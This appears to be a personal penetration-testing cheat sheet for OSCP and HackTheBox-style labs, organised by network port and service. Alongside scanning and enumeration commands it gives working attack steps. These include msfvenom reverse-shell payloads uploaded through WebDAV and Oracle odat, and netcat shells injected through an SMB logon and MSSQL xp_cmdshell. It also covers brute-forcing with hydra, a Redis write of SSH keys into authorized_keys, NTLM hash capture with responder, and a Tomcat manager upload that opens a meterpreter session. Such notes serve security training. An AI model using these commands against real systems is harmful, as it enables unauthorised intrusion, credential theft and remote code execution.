Enumeration
Checklist For Website Enumeration
Start a dirbuster scan after glimpsing at the pages.
☐ dirbuster > use usr/share/dirbuster/wordlists/medium lowercase
If nothing is found, run the search again with more file extensions like: sh, asp, aspx, cgi, txt, cnf, conf, html
If you cannot get any searching to work due to errors, Burp Suites Site Map feature
When you can't find anything, read through every single document - keep track of which ones you have been to in burp
☐ If you cannot find anything interesting, check that exploring the webpage did not reveal more folders and documents to explore
Also check for subdomains if you are running out of ideas
☐ gobuster vhost -u domain.com -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
guess what the domain.com is if you don't know
☐ Check the source code while waiting for directory scan
☐ Check the response headers for interesting information
☐ If ssl is active, view the certificate. Often times they will have FQDN in them to add to your /etc/hosts and have access to a different website
☐ View all page requests in burp, including the root /. You could be getting redirected to a page but the original page could still be shown in the response. This is an execution after redirect vulnerability.
☐ In burp click Action on a request, and select Do intercept > Response to this request. Change something like “302 Found” to “200 OK” to get it to load
If nmap returns a version of software look for an exploit
☐ use searchsploit -m exploit/path/name.txt to quickly copy your exploit into your current directory
EVEN IF SOMETHING looks like custom software or a random title google it anyways for exploits - oscp
If dealing with a login page look for
☐ Default credentials or credentials like admin admin
Use BurpSuite to bruteforce logins
files from dirbuster search which reveal user information
SQL injection, test with a single single quote.
☐ copy injectable burp request to file and input into sqlmap with -r flag.
☐ If you have a form where you can submit messages or other text try adding:
<img src="http://yourip/test"></img> and
<a href="http://yourip/">click me</a>
Setup a simple netcat listen on port 80 before submitting
☐ use davtest -url http://10.10.10.10 to test for file upload and file execution - especially if you have the put and move options from nmap scan
use cadaver 10.10.10.15 to interact with web dav
☐ maybe you can't upload and execute the file you need - try uploading the file as an allowed extension and moving it to the correct extension
To do this, change the request in burp from PUT or GET to MOVE /filename.html and directly underneath the first line add Destination: /filename.aspx
If your file upload extension is being blocked, try uploading it with a null byte. shell.aspx%00.jpg to trick it thinking it is a jpg
☐ Here is how to do it with curl:
— msfvenom -p windows/shell_reverse_tcp LHOST=lhost LPORT=lport -f aspx -o revshell.aspx
7. Rename the exploit to .txt file, coz we can only upload txt and html file
— mv revshell.aspx revshell.txt
8. Upload the exploit.txt file
— curl -X PUT http://granny.htb/revshell.txt — data-binary @revshell.txt
9. Rename the exploit.txt to revert back to aspx.
— curl -X MOVE — header ‘Destination:http://granny.htb/revshell.aspx' ‘http://granny.htb/revshell.txt'
10. Create a netcat shell to catch the reverse shell from the exploit.
— nc -nlvp 14143 and curl http://10.10.10.15/revshell.aspx
Nmap
☐ nmap -p- 192.168.1.1 > nmap.ports
cat nmap.ports | awk -F/ '/open/ {b=b","$1} END {print substr(b,2)}'
nmap -p 1,2,3 -sV -oA directory/filename -T4 -sC 192.168.1.1
☐ nmap -sV --script “vuln” 10.10.10.40
nmap -sU -O -p- -oA nmap/udp 10.10.10.3
nmap -sV --script=vulscan/vulscan.nse www.example.com
use -sU to scan udp instead of tcp
use -sT To scan using TCP connect (it takes longer, but is more likely to connect)
For OSCP: Rerun your nmap scan a couple times and use -T4 -A -O as well to double check, things don't always show up
Adding A Script
☐ google CVE-2021-41773 nse
download and add it to /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse
--script-updatedb
nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.50.124
Ports
FTP 21
☐ If you uploaded a file to run to ftp and it did not work, you probably forgot to put the server in binary mode. Just type binary to switch it
To determine the version of FTP running on a target system, there are a few methods that can be used. One option is to use the nmap tool to scan the target system and identify the version of FTP running. Another option is to establish a connection to the FTP service using a tool such as nc or ftp, and then use the appropriate commands to determine the version:
ftp 192.168.1.101
nc 192.168.1.101 21
nmap -sV 192.168.1.101 -p 21
Metasploit ftp_version module can be also used to scan a range of IP addresses and determine the version of any FTP servers that are running.
use auxiliary/scanner/ftp/ftp_versionftp-servers may allow anonymous users to access the ftp server:
anonymous : anonymous
anonymous :
ftp :
ftpThe Metasploit ftp_login auxiliary module can be used to perform brute force login attempts:
use auxiliary/scanner/ftp/ftp_version
Mounting A Share
☐ use showmount -e 10.10.10.180 to see if any folders are available to mount. If they are, use:
mount -t nfs 10.10.10.180:/site_backups /tmp/mount to mount it (/tmp/mount can be any folder you want to use)
If you have upload capabilities look into web payloads. These are payloads you can upload and then access on a browser to run. You will need a payload to run in whatever format the web server runs code in.
IIS webservers need: asp, aspx ----
root@kali:~# tree /usr/share/webshells/
/usr/share/webshells/
├── asp
│ ├── cmd-asp-5.1.asp
│ └── cmdasp.asp
├── aspx
│ └── cmdasp.aspx
├── cfm
│ └── cfexec.cfm
├── jsp
│ ├── cmdjsp.jsp
│ └── jsp-reverse.jsp
├── perl
│ ├── perlcmd.cgi
│ └── perl-reverse-shell.pl
└── php
├── findsock.c
├── php-backdoor.php
├── php-findsock-shell.php
├── php-reverse-shell.php
├── qsd-php-backdoor.php
└── simple-backdoor.php
SSH 22
To determine the version of SSH running on a target system, there are a few methods that can be employed. One option is to use the nmap tool to scan the target system and identify the version of SSH running on it. Another option is to establish a connection to the SSH service using a tool such as nc, and then use the appropriate commands to determine the version.
nc 192.168.1.101 22
nmap -sV 192.168.1.101 -p 22
The Metasploit ssh_login module can be used to perform brute force login attempts.
use auxiliary/scanner/ssh/ssh_login
only have to do the extra stuff if it gives you that error, means that it is old
If you get an rsa private key somehow you can login like this:
☐ ssh dev@10.10.10.79 -i id_rsa where ‘id_rsa’ is just a file with the key in it (note this includes everything including the text at the top and bottom'
I don't understand it but if the above does not work you can ‘decrypt’ the private key with
☐ openssl rsa -in hype_key_encrypted -out hype_key_decrypted
then login with ssh -i ~/hype_key_decrypted username@10.10.10.79
Brute Force Logins
☐ hydra -l username -P /usr/share/eaphammer/wordlists/rockyou.txt -s 2222 10.10.10.76 -t 4 ssh
or hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
☐ hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" for username bruteforce, put this in one of the commands above
☐ medusa -u username -P /usr/share/eaphammer/wordlists/rockyou.txt -h 10.10.10.76 -M ssh -n 22022
Trouble Connecting
☐ echo "Host 10.10.10.76" >> ~/.ssh/config
echo "KexAlgorithms +diffie-hellman-group1-sha1" >> ~/.ssh/config
Telnet 23
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet
SMTP 25
To determine the version of SMTP running on a target system, there are several methods that can be employed. One option is to use the nmap tool to scan the target system and identify the version of SMTP running on it. Another option is to establish a connection to the SMTP service using tools such as telnet or nc, and then use appropriate commands to determine the version.
nc 192.168.1.101 25
nmap -sV 192.168.1.101 -p 25
telnet 192.168.1.101 25
The Metasploit SMTP Enumeration module will connect to a given mail server and use a wordlist to enumerate users that are present on the remote system
use auxiliary/scanner/smtp/smtp_enum
The Metasploit open relay module can be used to find out open relay vulnerability in SMTP server
use auxiliary/scanner/smtp/smtp_relay
DNS 53
nslookup
The main way to query those records is by using the following syntax:
$ nslookup -query=<record type> nikosdano.com
Where <record type> is the DNS Record you would like to query. Here are some examples:
Of course, we can also use the ANY record to get as much information as possible.
dig
dig nikosdano.com
As you can see the default query record is “A.” Moreover, you can see several other information that may make the output more difficult to read. To simplify the output, we will be using those extra parameters on the following commands:
+nocmd – Removes the +cmd options output
+noall – Removes extra headers, flags, time information, message size, etc.
+answer – Tells dig to return the answer section (the “juicy” part of the output).
To specify the record we would like to query, we just have to add the record type right after the domain specification. Here is a basic syntax we will use:
dig +nocmd nikosdano.com <record> +noall +answer
Zone Transfer attack with dig
Let’s now see how we can perform one of the most common DNS attacks occurred by misconfigured DNS servers. It is unlucky to see this bug nowadays, but it is worth to mention it. If you are not familiar with Zone Transfer attacks, please have a look at the following links before moving on:
For this example, we will use a – on purpose – misconfigured server. zonetransfer.me has been set up for this purpose. What we need first to know is the Name Server(s) of zonetrasfer.me. By running: $ dig zonetransfer.me NS we can see that there are two available Name Servers. The first is: nsztm1.digi.ninja and the second is: nsztm2.digi.ninja.
Here is the command syntax to attempt a Zone Transfer attack with dig: $ dig axfr @<nameserver> target
So, in our case that we have two Name Servers available, we will use these commands:
dig +nocmd axfr @nsztm1.digi.ninja zonetransfer.me +noall +answer
dig +nocmd axfr @nsztm2.digi.ninja zonetransfer.me +noall +answer
As you can see from the output, we are able to see all the information leaked.
☐ If you see more domains after doing dig axfr example.htb @10.10.10.10 add them in a single line to /etc/hosts like: 10.10.10.123 friendzone.red administrator1.friendzone.red to be able to visit them
Fierce, DNSenum and DNSrecon
Find out the available Name Servers,
Try to perform a Zone Transfer attack and finally
Find the subnets available
Use a built-in or custom wordlist to brute force subdomains available.
To run the default scan against nikosdano.com run: $ fierce -dns nikosdano.com
Of course, we can specify the DNS server we would like to use for our reverse lookups. To do this, an extra parameter “-dnsserver” is required. So, if we choose to use dns2.registrar-servers.com we can run: $ fierce -dns nikosdano.com -dnsserver dns2.registrar-servers.com
Fierce uses a default wordlist for its tests. We can always specify our own wordlist by using the “-wordlist” parameter. Here is an example: fierce -dns nikosdano.com -wordlist wordlist.txt.
Dnsenum
Dnsenum is one of the author’s favorite tool during the DNS Enumeration steps. With a single command, we are able to query several DNS Records (A, MX, NS and more) and also attempt a zone transfer attack, a subdomain enumeration and more. The default command syntax looks like this: $ dnsenum nikosdano.com
From the image, you can see that all the A, NS, and MX records were returned. Moreover, we are able to see the IP of each server returned.
☐ dnsenum --dnsserver 10.10.10.248 -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o scans/dnsenum-bitquark-intelligence.htb intelligence.htb dnsenum VERSION:1.2.6
DNSrecon
Query all the available DNS records
Brute force for subdomains A
ttempt Zone Transfer attacks against every NS record
The default command to run is: $ dnsrecon -d nikosdano.com
Again, we are able to specify a Domain Server with the “-n” option. A dictionary for subdomain enumeration can be imported with the “-D” parameter.
For DNS enumeration, the first thing to do is try to resolve the IPs of Cronos. I’ll use nslookup, setting the server to Cronos, and then looking up Cronos’ IP:
root@kali# nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
Knowing the domain ns1.cronos.htb is useful, as it not only provides a domain name to poke at, but also confirms the base domain cronos.htb.
Any time there’s TCP DNS, it’s worth trying a zone transfer, which returns another two subdomains, admin and www:
root@kali# dig axfr cronos.htb @10.10.10.13
; <<>> DiG 9.11.16-2-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 14 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 07 21:08:57 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)
I’ll add the following line to my /etc/hosts file:
☐ for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" to search a range of addresses for valid ips
TFTP 69
This is a ftp-server but it is using UDP.
Finger 79
☐ Run finger user@10.10.10.10 to gain user information
Run finger admin@10.10.10.10 to gain admin information
Run finger @10.10.10.10 to see logged on users
Run finger username @10.10.10.10 to see info about a specific user
☐ use ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 to brute force usernames
Web 80/443
To determine the version of HTTP running on a target system, several methods can be employed, such as:
Using the
nmaptool to scan the target system and identify the version of HTTP running on it.Establishing a connection to the HTTP service using tools such as
telnetorncand using appropriate commands to determine the version.
nc 192.168.1.101 80/443
nmap -sV 192.168.1.101 -p 80/443
telnet 192.168.1.101 80/443
Enumeration using nikto
The Metasploit dir_scanner module can be used to identify the existence of interesting directories in a given directory path.
auxiliary/scanner/http/dir_scanner
☐ hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
Pop3 110/995
Portmapper 111
NNTP 119
NTP 123
MSRPC 135
SMB 139/445
Check List:
☐ smbclient -L //10.10.10.10 -L is for list shares. ADMIN$ C$ IPC$ are all default shares
smbclient -U ‘’ -L //10.10.10.10 try guest anonymous and blank for the value of -U
smbmap -H 10.10.10.10 another tool that helps list access to shares
☐ mount -t cifs //10.10.10.10/RemoteFolder /local/mnt/folder to mount the folder and be able to explore the files locally
☐ If you find a .vhd (virtual hard drive) file follow .vhd to extract credentials
☐ If you have a hash for a user do smbmap -u username -p ha:sh -H 10.10.10.10 and if succesful use psexec to gain a shell
☐ If you have a valid password and can write to default shares you can get a shell with psexec.py administrator@10.10.10.10
one option of the crack map exec suite is to bruteforce smb. We can use usernames gathered from enumeration and a password list from cewl or Hashcat. or
☐ crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success
☐ rpcclient -U ‘’ 10.10.10.10
Run a few commands and if you get responses look up enumeration for this. Otherwise if you just get access denied there is nothing here
☐ run command enumdomusers in rpc
run command srvinfo in rpc
run command setuserinfo2 user_name 23 ‘NewPassword123’ in rpc to attempt password change of known user
☐ If you get errors about “NT_STATUS_PASSWORD_MUST_CHANGE” Follow RPC steps below to change password
☐ run command setuserinfo2 user_name 23 ‘NewPassword123’ in rpc to attempt password change of known user with a previously known password
☐ You can also attempt to reset a password with smbpasswd -U user_name -r 10.10.10.10
Enumerate Hostname
nmblookup -A [ip]
List Shares
• • smbmap -H [ip]
echo exit | smbclient -L \\\\[ip]
nmap --script smb-enum-shares -p 139,445 [ip]
Check Null Sessions
◇ ◇ smbmap -H [ip/hostname]
smbclient \\\\[ip]\\[share name] (use -L to list out files put after smbclient)
Check for smb Vulnerabilities using nmap
nmap --script smb-vuln* -p 139,445 [ip]
nmap -p 445 --script vuln 10.10.10.4
nmap --script smb-enum-shares.nse -p445 10.10.10.10
If you have access to the logon command in smb, you can try the following to get a shell:
logon “/=`nc ‘attack box ip’ 4444 -e /bin/bash`"
make sure to setup a nc listener. hit enter if prompted for a password
If you have trouble uploading files you can always use:
smbclient -U 'usernamepassword' //10.10.10.97/sharename -c 'put /usr/share/sqlninja/apps/nc.exe nc.exe'
smbclient -N //10.10.10.123/Development -c 'put cmd.php cookie.php'
IMAP 143/993
IMAP lets you access email stored on that server. So imagine that you are on a network at work, the emails you recieve is not stored on your computer but on a specific mail-server. So every time you look in your inbox your email-client (like outlook) fetches the emails from the mail-server using imap.
IMAP is a lot like pop3. But with IMAP you can access your email from various devices. With pop3 you can only access them from one device.
Port 993 is the secure port for IMAP.
SNMP
☐ snmpwalk -c public -v2c 10.10.10.10 checks everything default, below can get more information so run that as well
☐ snmpwalk -c public -v2c 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpwalk -c public -v2c 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpwalk -c public -v2c 10.10.10.10 .1 #Enum all (untested)
☐ snmpbulkwalk -Cr1000 -c public -v2c 10.10.10.10 . > snmpwalk.output the period is important (remove -Cr1000 if not working)
☐ grep -oP ‘::.*?\.' snmpwalk.output | sort | uniq -c | sort -n
grep interestingname snmpwalk.output | less -S
grep interestingname snmpwalk.output | grep pidnumber to see all info of that pid running
☐ snmp-check 10.10.10.10
☐ nmap --script "snmp* and not snmp-brute" <target>
======
☐ snmp-check 10.10.10.10
snmpwalk -c public -v2c 10.10.10.10 checks everything default, below are more specific but this one should get everything
snmpwalk -c public -v2c 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendObjects
☐ snmpwalk -c public -v1 -t 10 192.168.50.151 use v for version number and t for time out time, c is the community string normally public but could change
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2 use the table below, or results from the top command, to query certain results
OneSixtyOne
Use this tool to brute force a list of ip addresses for snmp services
☐ echo public > community
echo private >> community
echo manager >> community
☐ for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
☐ onesixtyone -c community -i ips
If you’re seeing iso.3.6.1.2.1.1.1.0 instead of SNMPv2-MIB::sysDescr.0, make sure you have installed the snmp-mibs-downloader and edited the /etc/snmp/snmp.conf file as described in my Sneaky post.
Smux 199
LDAP 389/636
☐ ldapsearch -x -H ldap://support.htb -D '' -w '' -b "DC=support,DC=htb"
ldapsearch -x -H ldap://support.htb -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
If you see “a successful bind must...” then you cannot do anything more anonymously
500/4500 IPsec/IKE VPN
UDP 500 is used for Internet Key Exchange (IKE), which is used to establish an IPSEC VPN. There is some recon I can do on the IKE using ike-scan:
☐ ike-scan -M -A 10.10.10.10 -m for multi line and -a for aggressive. look for a shared key that you can crack (never used before)
IPSEC
Internet Protocol Security (IPSEC) is a suite of tools that are used for securing network traffic at the IP layer. There are two protocols that provide different security assurances:
• Authentication Header (AH) - Provides data integrity (will know if data is modified between senders), data source authentication (will know if the source isn’t what is expected for that connection), and protects against replay attacks.
• Encapsulating Security Payloads (ESP) - Provides similar capabilities, plus confidentiality (someone in the middle can’t see the data).
There’s also something called Security Associations (SA) which provide a bundle of algorithms to dynamically exchange keys and establish a secure connection over AH or ESP. IKE is one of those.
Modes
Both ESP and AH can operate in two modes:
◇ Transport mode - Provides security services between two hosts, applied to the payload of the IP packet, but the IP headers are left in the clear for routing.
◇ Tunneling - The entire IP packet is encrypted and/or authenticated, and it become the payload of a new IP packet with a header to send it to the other end. At the other end, the packet is encrypted and send based on the decrpyted headers.
Given it seems unlikely there’s a network behind this host, I’m going to guess I’ll need Transport mode for this host.
I’ll use the strongswan client to connect to the VPN. I’ll install it with:
☐ apt install strongswan
I’ll need to edit /etc/ipsec.conf and /etc/ipsec.secrets to connect.
☐ First the ipsec.secrets file:
# This file holds shared secrets or RSA private keys for authentication.
☐ 10.10.10.10 %any : PSK "Dudecake1!"
☐ Next, ipsec.conf - You might have to change info based on the output of the ike-scan. do not include the // comments those are for explanation:
# ipsec.conf - strongSwan IPsec configuration file
config setup
charondebug="all"
uniqueids=yes
strictcrlpolicy=no
conn conceal
authby=secret //try psk value if not working
auto=start //can try start instead
ike=3des-sha1-modp1024 //from ikescan try adding ! to the end if not working
esp=3des-sha1! //we get this from the snmp config output. try adding ! to the end if not working
type=transport //if you have a subnet you are accessing you will want to use tunnel
keyexchange=ikev1 //from ikescan
left=10.10.14.15 //your ip
right=10.10.10.116 //box you are attacking
rightsubnet=10.10.10.116[tcp] //only if what you are attacking only has tcp and not udp connections
ikelifetime=8h //revealed in enumeration, would be in base 16 so have to decode. Not sure you need this so try removing
fragmentation=yes //only add this if fragmentation appears in the ikescan
☐ ifconfig tun0 mtu 1000 as another troubleshooting step if things are not working. can also set value to 1382
• charondebug="all" - be more verbose to help me troubleshoot the connection.
• authby="secret" - use PSK auth.
• ike, esp, and keyexchange are set based on information from ike-scan.
• left and right represent my computer and the target computer.
• type=transport - use ipsec transport mode to connect host to host.
another example of what a config could look like. Using two different resources to build these notes
best way to troubleshoot:
look up your error in this documentation
☐ ipsec restart
ipsec up conceal conceal is the conn name in the configuration
☐ instead of that you can also try ipsec start --nofork
With the VPN connected, I can start recon over again and see a lot more
☐ nmap -sT -p- --min-rate 10000 -oA nmap/alltcp_vpn 10.10.10.116 make sure to use -sT when going through vpn or nmap will not work. nmap/alltcp_vpn is only because example had udp disabled
nmap -sC -sV -sT -oA nmap/conceal-tcp-ipsec 10.10.10.10
Modbus 502
Rlogin 513
Rsh 514
RTSP 554
RTSP (Real Time Streaming Protocol) is a stateful protocol built on top of tcp usually used for streaming images. Many commercial IP-cameras are running on this port. They often have a GUI interface, so look out for that.
Submission 587
Cups 631
SQL Server 1433/1434
Citrix 1494
Oracle 1521
What is a SID? The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID. Use the following command to find common SIDs
☐ odat all -s 10.10.10.82
odat sidguesser -s 10.10.10.82
running the all scan shows nothing that can be done, but passing in the --sysdba flag changes all of that:
☐ odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
☐ /opt/odat-libc2.17-x86_64/odat-libc2.17-x86_64 sidguesser -s 10.10.10.82
Credential Guessing:
includes python script to do it as well
use sql plus to login. you cannot do this unless you have a username, password, and sid to log into
☐ sqlplus scott/tiger@10.10.10.82/XE;
This will show the users permission and it seems we doesn’t have much permission.
☐ select * from user_role_privs;
But we can use sysdba which makes us login as system database administrator. Now we got some more Options. this is basically sudo.
☐ sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
☐ select * from user_role_privs;
While odat had indicated that we couldn’t execute files, in fact, we can, with the externaltable method. However, if we look at the help, it can only run an executable, no options allowed. So we’ll use msfvenom to make an exe:
☐ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=8084 -f exe -o shell.exe
odat utlfile -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --putFile \\temp shell.exe shell.exe
odat externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \\temp shell.exe
not these plugins are just extensions of odat. in the child cherry nodes there is one called “utlfile” which is where we use the utl file plugin to upload a web shell and ultimately get root, but as you can see there are countless other paths you can take as well.
utlfile
Here we use the utl file plugin of odat to upload an apsx web shell. asp and php webshells were also tried but failed, so just go through the list of webshells. we know to upload to \\inetpub\\wwwroot as this is the default file location of an IIS web server, but if it was changed you would have to somehow find outwhere and change accordingly. Since the only page of the website is the default launch page, it is reasonable to assume the default paths have not been changed.
☐ odat utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot cookie.aspx /usr/share/webshells/aspx/cmdasp.aspx
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.txt <(echo 0xdf was here)
We will use the /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell. This is a shell that loads ot the powershell environment then uses that to create a connection and a shell. At the top there are several examples of how to call the shell, we will choose one of these, input our information, and then put in at the bottom of the same file so that after the environment is created it then creates a connection to our ip address.
We host this changed powershell file and then download it with
NFS 2049
MySQL 3306
Armed with a username and password, I can connect with mssqlclient.py. I’ll make sure to use the -windows-auth flag if connecting to windows, and I’m connected:
☐ mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
see my current user’s permissions:
☐ SELECT * FROM fn_my_permissions(NULL, 'SERVER');
check out the databases available:
☐ SELECT name FROM master.sys.databases
look for user generated tables on those databases:
☐ use volume (or whatever other names come from the command above)
SELECT name FROM sysobjects WHERE xtype = 'U'
Shell with xp_dirtree
I’ll use xp_dirtree to load a file, and I’ll tell the db that the file is in an SMB share on my hosts. The server will try to authenticate to my host, where responder will collect the Net-NTLMv2. For more details, check out the [Giddy writeup] and/or [my post on Net-NTLMv2].
start responder:
☐ responder -I tun0
issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on my host:
☐ SQL> xp_dirtree '\\10.10.14.14\a';
Now crack it:
hashcat -m 5600 mssql-svc.netntlmv2 /usr/share/wordlists/rockyou.txt -o mssql-svc.netntlmv2.cracked --force
xp_cmdshell
is a way to just run commands directly on the machine. With every account you get always try:
☐ xp_cmdshell whoami
Note, the actual syntax to run a command is EXEC xp_cmdshell '[command]';. However, the client I’m using to connect, mssqlclient.py has a build in command to run a command over xp_cmdshell, so I can just type xp_cmdshell [command].
☐ xp_cmdshell \\192.168.49.142\share\nc64.exe -e cmd.exe 192.168.49.142 443
You might not be able to run xp_cmdshell, but you might be able to activate it then run it. Try:
☐ enable_xp_cmdshell
xp_cmdshell whoami
☐ xp_cmdshell \\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443
xp_cmdshell “powershell -e JAB...........”
Checkout portforwarding ligolo on how to setup a port forward incase the target is in a network.
RDesktop 3389
login on kali with rdesktop ipaddress
☐ hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
Distccd 3632
Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
Check if it's vulnerable to CVE-2004-2687 to execute arbitrary code:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
SVN 3690
Subversion is one of many version control options available today. It's often abbreviated as SVN. Subversion is used for maintaining current and historical versions of projects. Subversion is an open source centralized version control system. It's licensed under Apache. It's also referred to as a software version and revisioning control system.
☐ svn help shows all commands you can use to interact with this service.
☐ svn ls svn://10.10.10.10
svn log svn://10.10.10.10
☐ If you have multiple revisions, see if there are different files between them with svn up -r 2 (-r 2 being which revision you want to change into) and it should download those files and delete any files that do not match the new revision
svn checkout svn://10.10.10.10
☐ might need to add something to etc/hosts
if you ls now you should see the files downloaded locally
James Mail Server 25/110/119/4555
James Mail Server is listening on four ports with different functions. Simple Mail Transfer Protocol (SMTP) on TCP 25, Post Office Protocol (POP3) on TCP 110, and Network News Transfer Protocol (NNTP) on TCP 119 are all services that this box is offering. I could look at potentially brute forcing valid user names or sending phishing emails, but first I want to look at port 4555.
I can connect to 4555 with nc, and I’m prompted to login. The default creds of root/root work:
☐ nc 10.10.10.51 4555
I can get the list of commands with help:
☐ help
I can list users to see five accounts:
☐ listusers
I can change the password for each:
☐ setpassword -h
setpassword james 0xdf0xdf
For each account, I can now connect to TCP 110 (POP3) to check mail. telnet works best to connect to POP3. The first user, james, has no messages:
☐ telnet 10.10.10.51 110
USER james
PASS 0xdf0xdf
LIST
I’ll quit (CTRL+] followed by entering quit), and move on to the next user. No mail in thomas either, but john does show one message
I’ll use the RETR command to read it:
☐ RETR 1 ( if LIST shows number 2, then you have two emails to check with RETR 1 and RETR 2 etc...)
Redis 6379
I can interact with Redis just using nc. I can run keys to list the current keys:
☐ nc 10.10.10.160 6379
☐ keys (might need to add * keys *)
Use redis-cli for a cleaner interface:
☐ apt-get install redis-tools
☐ keys (might need to add * keys *)
Add something:
☐ incr cookie
☐ keys (might need to add * keys *)
get cookie
Write SSH key with Redis:
based on the output, you might have to change to a different users directory or something like that
☐ config get dir
☐ config set dir ./.ssh to change from your current directory to an available one in your current directory. If it works, then it means the folder exists
contfig get dir again to confirm you successfully changed directories
generate a key with ssh-keygen, and then add it to a file with some extra newlines before and after the key:
☐ (echo -e "\n\n"; cat ~/id_rsa_generated.pub; echo -e "\n\n") > spaced_key.txt
Redis is going to write a binary database file into authorized_keys, where sshd is then going to open that file as an ASCII text file and read it line by line, looking for a public key that matches the private key being sent to it. The newlines will help make sure that the public key is on its own line in the file.
I can use the -x options in redis-cli which will “read the last argument from STDIN” to cat this file into redis-cli and set it’s value into the database:
☐ cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set cookie
tell redis that the dbname is authorized_keys, and then save:
☐ config set dbfilename "authorized_keys"
save
☐ ssh -i ~/id_rsa_generated redis@10.10.10.160
Tomcat 8080
Port scanning to identify Tomcat
Let's scan the target machine (canyoupwnme) with nmap
$ nmap -A -T4 -sT -p1-65535 canyoupwnme
...
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
...
Check what is available
With your browser, open the URL
http://canyoupwnme:8080/manager
Seems that the Tomcat's management console is available, but authentication is needed. Metsasploit can help us...
Brute forcing the Tomcat's management console
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rhosts canyoupwnme
msf auxiliary(tomcat_mgr_login) > set rport 8080
msf auxiliary(tomcat_mgr_login) > exploit
[!] No active DB -- Credential data will not be saved!
[-] 10.0.100.195:8080 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] 10.0.100.195:8080 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
...)
[+] 10.0.100.195:8080 - LOGIN SUCCESSFUL: tomcat:tomcat
...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) > quit
Yep! Credentials tomcat:tomcat were found. Still using Metasploit, we can upload a crafted .WAR in order to have a meterpreter session.
Startin a meterpreter session
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(tomcat_mgr_upload) > set username tomcat
msf exploit(tomcat_mgr_upload) > set password tomcat
msf exploit(tomcat_mgr_upload) > set rhost canyoupwnme
msf exploit(tomcat_mgr_upload) > set rport 8080
msf exploit(tomcat_mgr_upload) > exploit
[*] Started reverse TCP handler on 10.0.100.245:4444
[*] canyoupwnme:8080 - Retrieving session ID and CSRF token...
[*] canyoupwnme:8080 - Uploading and deploying Hv5hJD7sAuzbRX3UGWiOctD6yz3j...
[*] canyoupwnme:8080 - Executing Hv5hJD7sAuzbRX3UGWiOctD6yz3j...
[*] canyoupwnme:8080 - Undeploying Hv5hJD7sAuzbRX3UGWiOctD6yz3j ...
[*] Sending stage (45741 bytes) to 10.0.100.195
[*] Meterpreter session 1 opened (10.0.100.245:4444 -> 10.0.100.195:52043) at 2016-04-18 13:33:40 +0200
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
Becoming
root
rootOn the attacker machine, download and configure a Perl reverse shell
$ wget http://pentestmonkey.net/tools/perl-reverse-shell/perl-reverse-shell-1.0.tar.gz
